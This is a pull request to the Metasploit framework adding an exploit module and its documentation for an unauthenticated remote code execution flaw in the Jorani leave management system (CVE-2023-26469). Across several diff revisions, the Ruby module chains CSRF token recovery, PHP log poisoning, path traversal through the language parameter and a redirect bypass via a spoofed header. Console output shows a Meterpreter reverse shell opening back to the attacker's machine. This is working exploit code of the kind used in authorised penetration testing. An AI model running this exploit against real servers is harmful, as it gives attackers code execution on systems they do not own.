### PR TITLE
Add exploit for unauth RCE Jorani

### DIFF
--- a/documentation/modules/exploit/multi/php/jorani_path_trav.md
+++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md
@@ -1,0 +1,52 @@
+## Vulnerable Application
+
+Jorani prior to 1.0.2 allows unauthenticated remote malicious users to execute arbitrary code.
+
+This is due to a lack of sanitization on language parameter, that can lead to file inclusion of ".php" files.
+
+Moreover, the log file for jorani ends with ".php" in Jorani < 1.0.2.
+
+Log poisonning is possible, so an authenticated attacker can execute arbitrary code.
+
+Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.
+
+So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application.
+
+This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.
+
+## Verification Steps
+1. Start `msfconsole`
+2. `use exploit/multi/php/jorani_path_trav`
+3. set `RHOSTS` and `RPORT`
+4. Confirm the target is vulnerable: `check`. The result expected is `The target appears to be vulnerable.`
+5. Default payload for the exploit will be `php/meterpreter/reverse_tcp`
+6. set `LHOST`
+7. `exploit`
+8. Confirm you have now a cmd session
+
+## Options
+
+### TARGETURI (optional)
+The path to the jorani website. By default it is empty.
+
+## Scenarios
+
+```
+msf6 exploit(multi/php/jorani_path_trav) > run
+
+[-] Handler failed to bind to 172.31.3.1:9898:-  -
+[*] Started reverse TCP handler on 0.0.0.0:9898
+[*] Trying to exploit LFI
+[*] Recovering CSRF token
+[+] CSRF found: 3ff4c712b884e3f577d9c3f65adac16f
+[*] Poisonning log with payload..
+[*] Sending 1st payload
+[*] Including poisonned log file log-2023-06-27.php
+[+] Triggering payload
+[*] Sending stage (39927 bytes) to 10.0.2.2
+[*] Meterpreter session 1 opened (10.0.2.15:9898 -> 10.0.2.2:46898) at 2023-06-27 19:21:28 +0200
+
+meterpreter > getuid 
+Server username: www-data
+```
+

--- a/documentation/modules/exploit/multi/php/jorani_path_trav.md
+++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md
@@ -20,6 +20,9 @@ So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbi
 
 This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.
 
+### Installation Steps
+For a step by step installation tutorial on Ubuntu please refer to [How to install Jorani](https://jorani.org/how-to-install-jorani.html)
+
 ## Verification Steps
 1. Start `msfconsole`
 2. `use exploit/multi/php/jorani_path_trav`
@@ -38,17 +41,17 @@ The path to the jorani website. By default it is empty.
 ## Scenarios
 
 ```
-msf6 exploit(multi/php/jorani_path_trav) > show options
+msf6 exploit(multi/php/jorani_path_trav) > options
 
 Module options (exploit/multi/php/jorani_path_trav):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     172.31.3.3       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RHOSTS     172.16.199.158   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT      80               yes       The target port (TCP)
-   SSL        true             no        Negotiate SSL/TLS for outgoing connections
-   TARGETURI  /                yes       The base path of Jorani
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  jorani           yes       The base path of Jorani
    VHOST                       no        HTTP server virtual host
 
 
@@ -56,8 +59,8 @@ Payload options (php/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  172.31.3.1       yes       The listen address (an interface may be specified)
-   LPORT  9898             yes       The listen port
+   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -69,24 +72,31 @@ Exploit target:
 
 
 View the full module info with the info, or info -d command.
-```
 
-```
 msf6 exploit(multi/php/jorani_path_trav) > run
 
-[-] Handler failed to bind to 172.31.3.1:9898:-  -
-[*] Started reverse TCP handler on 0.0.0.0:9898
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking Jorani version
+[+] Jorani seems to be running on the target!
+[+] Found version: 1.0.0
+[+] The target appears to be vulnerable.
 [*] Trying to exploit LFI
 [*] Recovering CSRF token
-[+] CSRF found: 3ff4c712b884e3f577d9c3f65adac16f
-[*] Poisonning log with payload..
+[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
+[*] Poisoning log with payload..
 [*] Sending 1st payload
-[*] Including poisonned log file log-2023-06-27.php
+[*] Including poisoned log file log-2023-08-18.php.
 [+] Triggering payload
-[*] Sending stage (39927 bytes) to 10.0.2.2
-[*] Meterpreter session 1 opened (10.0.2.15:9898 -> 10.0.2.2:46898) at 2023-06-27 19:21:28 +0200
+[*] Sending stage (39927 bytes) to 172.16.199.158
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400
 
-meterpreter > getuid 
+meterpreter > getuid
 Server username: www-data
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > exit
 ```
 

--- a/documentation/modules/exploit/multi/php/jorani_path_trav.md
+++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md
@@ -1,14 +1,20 @@
 ## Vulnerable Application
 
-Jorani prior to 1.0.2 allows unauthenticated remote malicious users to execute arbitrary code.
+Jorani prior to 1.0.2 allows unauthenticated users to execute arbitrary code.
 
-This is due to a lack of sanitization on language parameter, that can lead to file inclusion of ".php" files.
+This is due to a lack of sanitization on the language parameter, which can lead to the file inclusion of arbitrary ".php" files.
 
 Moreover, the log file for jorani ends with ".php" in Jorani < 1.0.2.
 
-Log poisonning is possible, so an authenticated attacker can execute arbitrary code.
+Log poisoning is possible, an attacker can abuse this to store malicious data in the log file.
+
+Data like '<?php ...;?>' can been added to the log file, then if this file is included by php, it will be executed.
 
 Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.
+
+So the scripts will not stop after the redirection because an exit statement is missing.
+
+Because of this, the attacker can make the script continue and reach the LFI vulnerability without being authenticated.
 
 So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application.
 
@@ -22,7 +28,7 @@ This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) 
 5. Default payload for the exploit will be `php/meterpreter/reverse_tcp`
 6. set `LHOST`
 7. `exploit`
-8. Confirm you have now a cmd session
+8. Confirm you have now a cmd session as www-data
 
 ## Options
 
@@ -30,6 +36,40 @@ This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) 
 The path to the jorani website. By default it is empty.
 
 ## Scenarios
+
+```
+msf6 exploit(multi/php/jorani_path_trav) > show options
+
+Module options (exploit/multi/php/jorani_path_trav):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.31.3.3       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path of Jorani
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.31.3.1       yes       The listen address (an interface may be specified)
+   LPORT  9898             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Jorani < 1.0.2
+
+
+
+View the full module info with the info, or info -d command.
+```
 
 ```
 msf6 exploit(multi/php/jorani_path_trav) > run

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -12,165 +10,155 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-        'Name'            => 'Jorani unauthenticated Remote Code Execution',
-        'Description'     => %q{
+                      'Name' => 'Jorani unauthenticated Remote Code Execution',
+                      'Description' => '
           This module exploits an unauthenticated Remote Code Execution in Jorani.
-          It abuses 3 vulnerability, it abuses log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+          It abuses 3 vulnerability: log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
           It has been tested on Jorani 1.0.0.
-        },
-        'License'         => MSF_LICENSE,
-        'Author'          => 
-          [ 
-              'RIOUX Guilhem (jrjgjk)' 
-          ],
-        'References'      => 
-          [
-            ['CVE', 'CVE-2023-26469'],
-            ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py' ]
-          ],
-        'Platform'        => %w[php],
-        'Arch'            => ARCH_PHP,
-        'Targets'         => 
-          [
-            ['Jorani <= 1.0.0', {}]
-          ],
-        'DefaultOptions'  => {
-          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-          'RPORT' => 443,
-          'SSL'   => true
-        },
-        'DisclosureDate'  => 'Jan 06 2023',
-        'Privileged'      => false,
-        'DefaultTarget'   => 0,
-        'Notes'           => 
-        {
-          'Stability'   => [CRASH_SAFE],
-          'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
-        }
-      )
+        ',
+                      'License' => MSF_LICENSE,
+                      'Author' =>
+                        [
+                          'RIOUX Guilhem (jrjgjk)'
+                        ],
+                      'References' =>
+                        [
+                          %w[CVE CVE-2023-26469],
+                          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
+                        ],
+                      'Platform' => %w[php],
+                      'Arch' => ARCH_PHP,
+                      'Targets' =>
+                        [
+                          ['Jorani <= 1.0.0', {}]
+                        ],
+                      'DefaultOptions' => {
+                        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                        'RPORT' => 443,
+                        'SSL' => true
+                      },
+                      'DisclosureDate' => 'Jan 06 2023',
+                      'Privileged' => false,
+                      'DefaultTarget' => 0,
+                      'Notes' =>
+                      {
+                        'Stability' => [CRASH_SAFE],
+                        'Reliability' => [REPEATABLE_SESSION],
+                        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+                      })
     )
 
     register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
-        ]
-      )
-
+      [
+        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
+      ]
+    )
   end
 
   def get_version(res)
-    matches = res.body.scan(/&nbsp;v([0-9\.]+)&nbsp;&copy;/i)
+    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
     if matches[0].nil?
-      print_error("Cannot recovered Jorani version...")
+      print_error('Cannot recovered Jorani version...')
       return nil
     end
-    return matches[0][0]
+    matches[0][0]
   end
 
-  def isServiceRunning(res)
+  def service_running(res)
     matches = res.body.scan(/Leave Management System/)
     if matches[0].nil?
       print_error("Jorani doesn't appears to be running on the target")
       return false
     end
-    return true
+    true
   end
 
-  def recoverCsrf(res)
+  def recover_csrf(res)
     matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
-    if matches.length() == 1 and matches[0].length() == 1
-      return matches[0][0]
-    end
-    return ""
+    return matches[0][0] if matches.length == 1 && matches[0].length == 1
+
+    ''
   end
 
   def check
     # For the check command
-    print_status("Checking Jorani version")
+    print_status('Checking Jorani version')
     uri = normalize_uri(target_uri.path, 'index.php')
 
     res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => "#{uri}/session/login"
+      'uri' => "#{uri}/session/login"
     )
 
-    if !isServiceRunning(res)
-      return Exploit::CheckCode::Safe
-    else
-      print_good("Jorani seems to be running on the target !")
-    end
+    return Exploit::CheckCode::Safe unless service_running(res)
 
-    currentVersion = get_version(res)
-    if currentVersion.nil?
-      return Exploit::CheckCode::Detected
-    end
-    print_good("Found version: #{currentVersion}")
-    currentVersion = Gem::Version.new(currentVersion)
+    print_good('Jorani seems to be running on the target !')
 
-    if currentVersion <= Gem::Version.new('1.0.0')
-      return Exploit::CheckCode::Vulnerable
-    else
-      return Exploit::CheckCode::Safe
-    end
+    current_version = get_version(res)
+    return Exploit::CheckCode::Detected if current_version.nil?
+
+    print_good("Found version: #{current_version}")
+    current_version = Gem::Version.new(current_version)
+
+    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
     # Main function
-    print_status("Trying to exploit LFI")
+    print_status('Trying to exploit LFI')
 
-    pathTravPayload = "../../application/logs"
-    headerName = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
-    poisonPayload    = "<?php if(isset($_SERVER['HTTP_" + headerName + "'])){ #{payload.encoded} } ?>"
-    logFileName = "log-" + Time.now.strftime("%Y-%m-%d")
+    path_trav_payload = '../../application/logs'
+    header_name = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
+    poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"
+    log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"
 
     uri = normalize_uri(target_uri.path, 'index.php')
 
     res = send_request_cgi(
-      'method'       => 'GET',
+      'method' => 'GET',
       'keep_cookies' => true,
-      'uri'          => "#{uri}/session/login"
+      'uri' => "#{uri}/session/login"
     )
 
-    print_status("Recovering CSRF token")
-    csrfTok = recoverCsrf(res)
-    if csrfTok != ""
-      print_good("CSRF found: #{csrfTok}")
+    print_status('Recovering CSRF token')
+    csrf_tok = recover_csrf(res)
+    if csrf_tok != ''
+      print_good("CSRF found: #{csrf_tok}")
     else
       print_status("CSRF not found, doesn't mean its not vulnerable")
     end
-    print_status("Poisonning log with payload..")
-    print_status("Sending 1st payload")
+    print_status('Poisonning log with payload..')
+    print_status('Sending 1st payload')
 
-    res = send_request_cgi(
-      'method'       => 'POST',
+    send_request_cgi(
+      'method' => 'POST',
       'keep_cookies' => true,
-      'uri'          => "#{uri}/session/login",
-      'data'         => "csrf_test_jorani=#{csrfTok}&last_page=session/login&language=#{pathTravPayload}&login=#{Rex::Text.uri_encode(poisonPayload)}&CipheredValue=DummyPassword"
+      'uri' => "#{uri}/session/login",
+      'data' => "csrf_test_jorani=#{csrf_tok}&last_page=session/login&language=#{path_trav_payload}&login=#{Rex::Text.uri_encode(poison_payload)}&CipheredValue=DummyPassword"
     )
 
-    print_status("Including poisonned log file #{logFileName}.php")
-    print_good("Triggering payload")
+    print_status("Including poisonned log file #{log_file_name}.php")
+    print_good('Triggering payload')
 
-    cmdRes = send_request_cgi(
-      'method'       => 'GET',
+    cmd_res = send_request_cgi(
+      'method' => 'GET',
       'keep_cookies' => true,
-      'uri'          => "#{uri}/pages/view/#{logFileName}",
-      'headers'      =>
+      'uri' => "#{uri}/pages/view/#{log_file_name}",
+      'headers' =>
       {
-            'X-REQUESTED-WITH' => 'XMLHttpRequest',
-            headerName         => "MSFExploit"
+        'X-REQUESTED-WITH' => 'XMLHttpRequest',
+        header_name => 'MSFExploit'
       }
     )
 
-    if !cmdRes.nil? and cmdRes.body.scan(/Invalid login id or password for user/).length() > 0
-      print_good("Exploit worked !!")
+    if !cmd_res.nil? && cmd_res.body.scan(/Invalid login id or password for user/).length.positive?
+      print_good('Exploit worked !!')
     else
-      print_error("It seems that exploit failed..")
+      print_error('It seems that exploit failed..')
     end
 
-    return
-
+    nil
   end
-
 end

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     print_status("Including poisoned log file #{log_file_name}.php")
-    vprint_warning("The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned logfile. Be careful running this exploit around midnight across timezones.")
+    vprint_warning('The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned log file. Be careful running this exploit around midnight across timezones.')
     print_good('Triggering payload')
 
     send_request_cgi(

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -55,7 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_version(res)
-    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
+    footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text
+    matches = footer_text.scan(/v([0-9.]+)/i)
     if matches.nil? || matches[0].nil?
       print_error('Cannot recovered Jorani version...')
       return nil
@@ -64,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def service_running(res)
-    matches = res.body.scan(/Leave Management System/)
+    matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/)
     if matches.nil?
       print_error("Jorani doesn't appear to be running on the target")
       return false
@@ -73,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def recover_csrf(res)
-    matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
-    return matches[0][0] if matches.length == 1 && matches[0].length == 1
+    csrf_token = res.get_html_document.xpath('//input[@name="csrf_test_jorani"]/@value').text
+    return csrf_token if csrf_token.length == 32
 
     nil
   end
@@ -152,6 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     print_status("Including poisoned log file #{log_file_name}.php")
+    vprint_warning("The date on the attacker and victim machine must be the same for the exploit to be successful due to the timestamp on the poisoned logfile. Be careful running this exploit around midnight across timezones.")
     print_good('Triggering payload')
 
     send_request_cgi(

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Jorani unauthenticated Remote Code Execution',
         'Description' => %q{
-          This module exploits an unauthenticated Remote Code Execution in Jorani.
-          It abuses 3 vulnerability: log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+          This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.
+          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
           It has been tested on Jorani 1.0.0.
         },
         'License' => MSF_LICENSE,
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_version(res)
     matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
-    if matches[0].nil?
+    if matches.nil? || matches[0].nil?
       print_error('Cannot recovered Jorani version...')
       return nil
     end
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
     return matches[0][0] if matches.length == 1 && matches[0].length == 1
 
-    ''
+    nil
   end
 
   def check
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Found version: #{current_version}")
     current_version = Rex::Version.new(current_version)
 
-    return Exploit::CheckCode::Appears if current_version <= Rex::Version.new('1.0.0')
+    return Exploit::CheckCode::Appears if current_version < Rex::Version.new('1.0.2')
 
     Exploit::CheckCode::Safe
   end
@@ -133,12 +133,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Recovering CSRF token')
     csrf_tok = recover_csrf(res)
-    if csrf_tok != ''
-      print_good("CSRF found: #{csrf_tok}")
-    else
+    if csrf_tok.nil?
       print_status('CSRF not found, doesn\'t mean its not vulnerable')
+    else
+      print_good("CSRF found: #{csrf_tok}")
     end
-    print_status('Poisonning log with payload..')
+    print_status('Poisoning log with payload..')
     print_status('Sending 1st payload')
 
     send_request_cgi(
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
                 "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"
     )
 
-    print_status("Including poisonned log file #{log_file_name}.php")
+    print_status("Including poisoned log file #{log_file_name}.php")
     print_good('Triggering payload')
 
     cmd_res = send_request_cgi(

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Including poisoned log file #{log_file_name}.php")
     print_good('Triggering payload')
 
-    cmd_res = send_request_cgi(
+    send_request_cgi(
       'method' => 'GET',
       'keep_cookies' => true,
       'uri' => "#{uri}/pages/view/#{log_file_name}",

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -12,42 +12,39 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-                      'Name' => 'Jorani unauthenticated Remote Code Execution',
-                      'Description' => %q{
-                        This module exploits an unauthenticated Remote Code Execution in Jorani.
-                        It abuses 3 vulnerability: log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
-                        It has been tested on Jorani 1.0.0.
-                      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'RIOUX Guilhem (jrjgjk)'
-                        ],
-                      'References' =>
-                        [
-                          %w[CVE 2023-26469],
-                          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
-                        ],
-                      'Platform' => %w[php],
-                      'Arch' => ARCH_PHP,
-                      'Targets' =>
-                        [
-                          ['Jorani < 1.0.2', {}]
-                        ],
-                      'DefaultOptions' => {
-                        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-                        'RPORT' => 443,
-                        'SSL' => true
-                      },
-                      'DisclosureDate' => '2023-01-06',
-                      'Privileged' => false,
-                      'DefaultTarget' => 0,
-                      'Notes' =>
-                      {
-                        'Stability'   => [CRASH_SAFE],
-                        'Reliability' => [REPEATABLE_SESSION],
-                        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
-                      })
+        'Name' => 'Jorani unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated Remote Code Execution in Jorani.
+          It abuses 3 vulnerability: log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+          It has been tested on Jorani 1.0.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'RIOUX Guilhem (jrjgjk)'
+        ],
+        'References' => [
+          ['CVE', '2023-26469'],
+          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
+        ],
+        'Platform' => %w[php],
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          ['Jorani < 1.0.2', {}]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DisclosureDate' => '2023-01-06',
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
     )
 
     register_options(

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -166,12 +166,6 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    if !cmd_res.nil? && cmd_res.body.scan(/Invalid login id or password for user/).length.positive?
-      print_good('Exploit worked !!')
-    else
-      print_error('It seems that exploit failed..')
-    end
-
     nil
   end
 end

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def service_running(res)
     matches = res.body.scan(/Leave Management System/)
-    if matches[0].nil?
+    if matches.nil?
       print_error("Jorani doesn't appear to be running on the target")
       return false
     end

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -1,0 +1,176 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'            => 'Jorani unauthenticated Remote Code Execution',
+        'Description'     => %q{
+          This module exploits an unauthenticated Remote Code Execution in Jorani.
+          It abuses 3 vulnerability, it abuses log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+          It has been tested on Jorani 1.0.0.
+        },
+        'License'         => MSF_LICENSE,
+        'Author'          => 
+          [ 
+              'RIOUX Guilhem (jrjgjk)' 
+          ],
+        'References'      => 
+          [
+            ['CVE', 'CVE-2023-26469'],
+            ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py' ]
+          ],
+        'Platform'        => %w[php],
+        'Arch'            => ARCH_PHP,
+        'Targets'         => 
+          [
+            ['Jorani <= 1.0.0', {}]
+          ],
+        'DefaultOptions'  => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'RPORT' => 443,
+          'SSL'   => true
+        },
+        'DisclosureDate'  => 'Jan 06 2023',
+        'Privileged'      => false,
+        'DefaultTarget'   => 0,
+        'Notes'           => 
+        {
+          'Stability'   => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
+        ]
+      )
+
+  end
+
+  def get_version(res)
+    matches = res.body.scan(/&nbsp;v([0-9\.]+)&nbsp;&copy;/i)
+    if matches[0].nil?
+      print_error("Cannot recovered Jorani version...")
+      return nil
+    end
+    return matches[0][0]
+  end
+
+  def isServiceRunning(res)
+    matches = res.body.scan(/Leave Management System/)
+    if matches[0].nil?
+      print_error("Jorani doesn't appears to be running on the target")
+      return false
+    end
+    return true
+  end
+
+  def recoverCsrf(res)
+    matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
+    if matches.length() == 1 and matches[0].length() == 1
+      return matches[0][0]
+    end
+    return ""
+  end
+
+  def check
+    # For the check command
+    print_status("Checking Jorani version")
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => "#{uri}/session/login"
+    )
+
+    if !isServiceRunning(res)
+      return Exploit::CheckCode::Safe
+    else
+      print_good("Jorani seems to be running on the target !")
+    end
+
+    currentVersion = get_version(res)
+    if currentVersion.nil?
+      return Exploit::CheckCode::Detected
+    end
+    print_good("Found version: #{currentVersion}")
+    currentVersion = Gem::Version.new(currentVersion)
+
+    if currentVersion <= Gem::Version.new('1.0.0')
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # Main function
+    print_status("Trying to exploit LFI")
+
+    pathTravPayload = "../../application/logs"
+    headerName = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
+    poisonPayload    = "<?php if(isset($_SERVER['HTTP_" + headerName + "'])){ #{payload.encoded} } ?>"
+    logFileName = "log-" + Time.now.strftime("%Y-%m-%d")
+
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method'       => 'GET',
+      'keep_cookies' => true,
+      'uri'          => "#{uri}/session/login"
+    )
+
+    print_status("Recovering CSRF token")
+    csrfTok = recoverCsrf(res)
+    if csrfTok != ""
+      print_good("CSRF found: #{csrfTok}")
+    else
+      print_status("CSRF not found, doesn't mean its not vulnerable")
+    end
+    print_status("Poisonning log with payload..")
+    print_status("Sending 1st payload")
+
+    res = send_request_cgi(
+      'method'       => 'POST',
+      'keep_cookies' => true,
+      'uri'          => "#{uri}/session/login",
+      'data'         => "csrf_test_jorani=#{csrfTok}&last_page=session/login&language=#{pathTravPayload}&login=#{Rex::Text.uri_encode(poisonPayload)}&CipheredValue=DummyPassword"
+    )
+
+    print_status("Including poisonned log file #{logFileName}.php")
+    print_good("Triggering payload")
+
+    cmdRes = send_request_cgi(
+      'method'       => 'GET',
+      'keep_cookies' => true,
+      'uri'          => "#{uri}/pages/view/#{logFileName}",
+      'headers'      =>
+      {
+            'X-REQUESTED-WITH' => 'XMLHttpRequest',
+            headerName         => "MSFExploit"
+      }
+    )
+
+    if !cmdRes.nil? and cmdRes.body.scan(/Invalid login id or password for user/).length() > 0
+      print_good("Exploit worked !!")
+    else
+      print_error("It seems that exploit failed..")
+    end
+
+    return
+
+  end
+
+end

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -9,13 +9,15 @@ class MetasploitModule < Msf::Exploit::Remote
